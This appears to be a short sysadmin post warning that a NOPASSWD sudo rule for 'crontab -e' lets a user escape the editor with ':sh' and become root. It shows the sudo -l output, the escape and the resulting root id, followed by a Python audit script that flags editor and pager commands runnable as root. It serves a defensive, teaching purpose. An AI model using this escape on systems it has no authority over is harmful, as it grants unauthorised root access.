Good senior engineers recently stopped a junior SA from giving out quite a lot of power while setting up a sudo profile.
The example below shows the user's privileges in the sudo profile.
[user@server /root]$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", logfile=/var/log/sudo.log
Runas and Command-specific defaults for user:
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/crontab -e
From there, as the user, you can do the following:
[user@server /root]$ sudo /usr/bin/crontab -e
(break out with :sh)
[root@server spool]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
This then gives you root access.
Just a small pointer to be careful of.
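One way to catch this kind of entry during review, as an added example that is not part of the original post: a small audit of `sudo -l` output that flags commands runnable as root which open an editor or pager. The function names and the `INTERACTIVE` list are assumptions made for illustration, and every sample entry other than the first is constructed.

```python
import re

# Assumption: an illustrative, non-exhaustive set of programs that open an
# interactive editor or pager from which a shell can be started.
INTERACTIVE = {"vi", "vim", "view", "less", "more", "man"}

# One entry line of `sudo -l`, e.g. "(root) NOPASSWD: /usr/bin/crontab -e"
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*"
                   r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def risky_reason(argv):
    """Return why a command can lead to a shell, or None if not flagged."""
    name = argv[0].rsplit("/", 1)[-1]
    # A bare "crontab" entry allows any arguments, including -e.
    if name == "crontab" and (len(argv) == 1 or "-e" in argv[1:]):
        return "crontab -e opens the target user's crontab in an editor"
    if name in INTERACTIVE:
        return name + " is an interactive editor/pager"
    return None

def audit(sudo_l_output):
    """Flag entries that let the user run an editor-spawning command as root."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # Defaults lines and headers are not entries
        # "(root)", "(ALL)" or "(ALL : ALL)": the user part comes before ':'
        runas_users = {u.strip() for u in m["runas"].split(":")[0].split(",")}
        if not runas_users & {"root", "ALL"}:
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        # Several commands may share one line; "\," is an escaped comma
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            argv = cmd.split()
            reason = risky_reason(argv) if argv else None
            if reason:
                findings.append({"command": cmd, "nopasswd": nopasswd, "reason": reason})
    return findings

# Constructed sample: the first entry is the one from the post, the rest are made up.
SAMPLE = """\
    (root) NOPASSWD: /usr/bin/crontab -e
    (root) /usr/bin/crontab -l, /usr/bin/less /var/log/messages
    (appuser) NOPASSWD: /usr/bin/vim /etc/app.conf
    (root) NOPASSWD: /usr/bin/systemctl restart httpd
"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Run it over the output of `sudo -l -U <user>` for each account before a new profile goes live; it only covers the editor and pager case and does not replace a full sudoers review.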